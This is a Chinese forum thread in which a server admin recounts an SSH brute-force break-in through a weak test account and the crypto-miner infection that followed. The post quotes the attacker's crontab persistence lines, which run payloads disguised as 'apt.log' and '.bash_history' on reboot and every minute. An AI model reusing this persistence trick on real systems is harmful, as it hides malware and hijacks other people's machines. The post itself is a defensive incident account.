找回密码
 立即注册
搜索
查看: 344|回复: 3

网站子服务器被黑经历

[复制链接]

5

主题

6

回帖

214747万

积分

管理员

积分
2147478194
发表于 2026-3-17 01:52:52 | 显示全部楼层 |阅读模式
先顺一下时间线
Mar.15
配置好了一个beszel的面板监控(艹,我忘了给加告警通知了)
想要装个其他东西,提示我不要在sudo权限下运行,然后我创建了个ubuntu账户,密码是ubuntu弱密码,然后没搞成功,睡觉去了(™我忘删了啊!!!)
一小时后
Mar.16
凌晨00:09,一个IP是92.118.39.95的外国SSH弱密码爆破的IP成功登陆进来我服务器了:
  1. Mar 16 00:09:18 serxxxx sshd[726196]: Accepted password for ubuntu from 92.118.39.95 port 44518 ssh2
复制代码
00:40在我的服务器上面执行了把自己伪装成apt并且开机自启且定时执行的程序:

  1. @reboot /bin/sh -c "(cd '/var/tmp' && [ -f 'apt.log' ] && (chattr -i 'apt.log' 2>/dev/null; chmod +x 'apt.log' && ./'apt.log')); (cd '$HOME' && [ -f '.bash_history' ] && (chattr -i '.bash_history' 2>/dev/null; chmod +x '.bash_history' && ./'.bash_history')); "
  2. * * * * * /bin/sh -c "(cd '/var/tmp' && [ -f 'apt.log' ] && (chattr -i 'apt.log' 2>/dev/null; chmod +x 'apt.log' && ./'apt.log')); (cd '$HOME' && [ -f '.bash_history' ] && (chattr -i '.bash_history' 2>/dev/null; chmod +x '.bash_history' && ./'.bash_history')); "
复制代码
就开始在我的服务器上面跑
Mar.17
凌晨,我闲的没事登beszel的时候看到那台服务器CPU占用是100%,内存也很高,就登到ssh里面开btop看
看也看不出啥,就一个叫“apt”的程序占用最高,我就到云服务商那里重启了一下(我这步纯啥博弈)
问了问AI,看了crontab列表,就是上面这段代码,看了看系统登录日志,也是啥也没看出来,全都是被fail2ban挡了或者是防火墙拦了
又周旋了几分钟,我用好像是:
  1. grep "Accept" syslog
复制代码
的查看了登录成功的日志,看到一个及其可疑登陆成功的时间,就在占用高开始前几十分钟
  1. Mar 16 00:09:18 serxxxx sshd[726196]: Accepted password for ubuntu from 92.118.39.95 port 44518 ssh2
复制代码
就是这个!到tx威胁情报上面查了,果然是爆破SSH的
就结束了...
这波我纯啥博弈

最后只能说提醒搞完测试之后一定要处理好测试用的一些东西啊!!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×

5

主题

6

回帖

214747万

积分

管理员

积分
2147478194
 楼主| 发表于 2026-3-18 22:59:44 | 显示全部楼层
咱也就还好是啥也没干,不然还有数据的损失,最后感觉那个挖矿清不掉了我直接重装系统了

5

主题

6

回帖

214747万

积分

管理员

积分
2147478194
 楼主| 发表于 2026-4-5 22:06:27 | 显示全部楼层

5

主题

6

回帖

214747万

积分

管理员

积分
2147478194
 楼主| 发表于 2026-4-5 22:17:05 | 显示全部楼层
[img][/img][img][/img]
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|FCV Forum

GMT+8, 2026-10-1 21:07 , Processed in 0.095553 second(s), 29 queries .

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表